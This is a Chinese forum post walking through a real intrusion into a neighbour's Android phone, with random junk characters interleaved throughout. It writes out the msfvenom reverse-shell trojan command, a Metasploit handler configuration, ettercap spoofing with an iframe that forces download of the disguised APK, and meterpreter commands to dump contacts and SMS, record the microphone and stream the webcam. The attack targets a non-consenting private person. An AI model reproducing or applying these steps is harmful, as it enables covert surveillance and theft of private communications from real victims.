4 `$ o; A+ M2 Y5 L4 m2 Z 五、msf+ettercap入侵邻居安卓手机
首先启动msf
8 s' \. ^$ u, C+ _+ v: K! _ 先用kali生成一个安卓木马,如下命令: 1 ] W7 R$ h# {$ y
$ _% Y$ f% [, Q2 ^Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
/ S1 U% o) u% M/ k3 M3 {9 t5 `& V- n 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ( E0 n4 `& r, x3 g( I7 a: p
然后进入msf
use exploit/multi/handler
# e: r$ M% x6 w, y set payload android/meterpreter/reverse_tcp ) y8 [$ n s$ M; O
3 K. ]0 b2 o0 @& k5 r set LHOST 192.168.0.109 //ip为kaili的ip ( M: k; k. |7 ]% T# S8 X
4 V+ {! X! T- F set LPORT 44444 //端口一定要与前面生成的木马的端口一致 6 b9 D. F6 {6 ^
: w O! d8 a2 r0 z% R ?3 ]+ o) y; h- q4 S6 k0 _ Exploit & \* R$ h0 A2 p
6 U9 }! o- W9 m" g$ T7 C$ A. n 下面我们开启ettercap -G ! d$ C7 l# H7 ` O
我物理IP为 3 m# S1 O' E' @/ x
, w* B; q) ?5 o1 f/ {) \
d0 i% {& R# F6 E 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, + p9 ~- m) q% C6 }
" t7 E( q0 _; Z/ \' b- Q下面我们来设置一下 - X( c8 {6 d# |
( s: x) f2 T$ g, L4 r0 B
( Z! K' m- ]. c, L, z 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
/ x0 g/ U9 h( P5 c% _ / L) R. W( V# t6 A0 y
- w, b' b2 U9 s! T! j; u ' U. D, R$ I9 F8 a* Z
: M- I3 C/ |8 P/ w+ r2 P 9 u8 b" B4 W% G) r* c
. P" g4 _3 D% ]: d0 @) Q; b
& f4 e# D, O; Y+ [4 A& z1 O, o& @ ]) `' x) ~# u$ \/ r8 O8 m/ F# C/ b
3 Z# Q. z! X4 i6 d0 m( r* h/ \8 k2 K1 L _4 g2 _3 q& O . T# q. V8 ~4 N/ O" F; a
, J" s3 g8 K! l6 k/ A
1 P, @) o+ I6 c 0 D8 o0 n8 |2 N( F
/ a- a8 ?; [: N4 W6 q 2 P7 u& V' F' l' ^8 w
1 |9 }7 q& `' W$ H2 ^1 {# [1 Q& v R
5 }! u: W B9 o. H$ Z$ h9 K. X
. ]" W5 Q" f9 M$ s( b" u1 I! c' t, h9 V2 \1 \" h3 g
3 C" g' c3 `' x% U6 r5 o下面我们开始攻击
" K) q N! l3 X- o7 V% B4 G, B! N' q: l& o
! F& h' t( c( B" _3 \2 L2 q( ] A; r& b: l: U8 f8 h* }( F
3 ^3 ^ \) a$ G/ ~- c C2 ~% I* g- @3 |* V5 f
6 V6 R9 r1 U Q" {
x1 _ b: S; M9 e9 \( E4 h# b
大概过了5分钟多,发现反弹成功了 9 B3 w& i6 W" k) N1 a( g9 k! ~
# R1 {* `4 T& a9 B! O9 N9 |7 ?- U) L& O6 H8 N( e9 q$ o
: q: K- k% X6 u3 K& `7 e9 u
0 y% M' N9 A9 e: T: r
" _+ f' a8 @ \- p4 a$ `" l! b' N2 R, F" _- ?- b1 k+ k& R* L$ | ( z3 b* X$ |) B8 |* u, a4 l, q
. p) t& b( u x e0 Z: z
& w9 A. G3 p+ C8 w2 G
3 d) B4 y7 C: o' m
6 M" B1 g2 ~* S$ o执行命令
|$ J$ x6 b1 B8 D$ g! ?+ t2 M4 f( L. U" Z1 j5 a : `) c% E; ~" G4 D
( R, h# P N: j! r1 r% [, D- R- L7 A: Z T. u* @% ^ dump_contacts --》这个是导出电话 * w! q) O$ W- o
dump_sms --》这个是导出信息 & n* `3 c+ P* h3 L$ m
record_mic Record audio from the default microphone for X seconds
# Z4 Z* x$ p6 U& s& ]+ H1 W- d7 b) u% o webcam_chat Start a video chat & D0 G7 j: H% q4 r) M9 Z" l
; V2 ]+ z! E( K# I3 Q t9 d webcam_list List webcams ! V" G' Q- [9 M+ X0 x
. D7 L* g( w/ C$ ^) F7 ]! pwebcam_snap Take a snapshot from the specified webcam
" q9 C [, F# b+ ^webcam_stream  lay a video stream from the specified webcam $ C/ ^/ E1 k( J. F/ u
8 R W' V; F) Q" M% s
# r! {! J* j7 P+ p+ W" C2 L- v% b- w( k f- f- H$ K$ x: { 我们打开看一下电话薄, ) w+ |8 t) h4 D& k
. ]$ `! q! C3 \8 ~. b( ~/ _4 y, n; M' w% S5 `2 g( [9 O& N4 V ; }4 Q4 |4 m, W0 e
( d+ H6 k! c! F4 }$ L* a$ G( r0 T2 V
6 {& y! P( b5 QK7 S' B% w0 v. o8 I9 ]
2 r* g. _- G4 K: J: N# ?: M5 @4 \
$ L' Q0 ^! s: e! A T- S2 {1 F) T; Iy! q, G9 X) F7 E; N 3 G' Z8 W+ v* M! x1 I
2 C6 i$ _2 f) ^1 P1 O% R6 i 我们同时欺骗成DroidJack木马,使用方法如图: # Z5 p% I% Z" w0 b/ m: }* s
$ R0 N3 {& [1 v/ q. q
0 _/ h3 q/ `* b1 c' H8 Y' U f/ [1 z + b/ D4 J+ M- K
) w3 }! {* S) P. }- y
6 b1 O; L" g. ?) h, R3 s 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 h& t* k+ v! c% ?! h
0 J: O" s! R5 q v$ n, n# S6 A& T p0 X$ t9 \
* d* k/ ?9 `9 p. G ; Z7 M9 ]2 r# N0 O
: {* Q( ?9 f5 {8 j
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |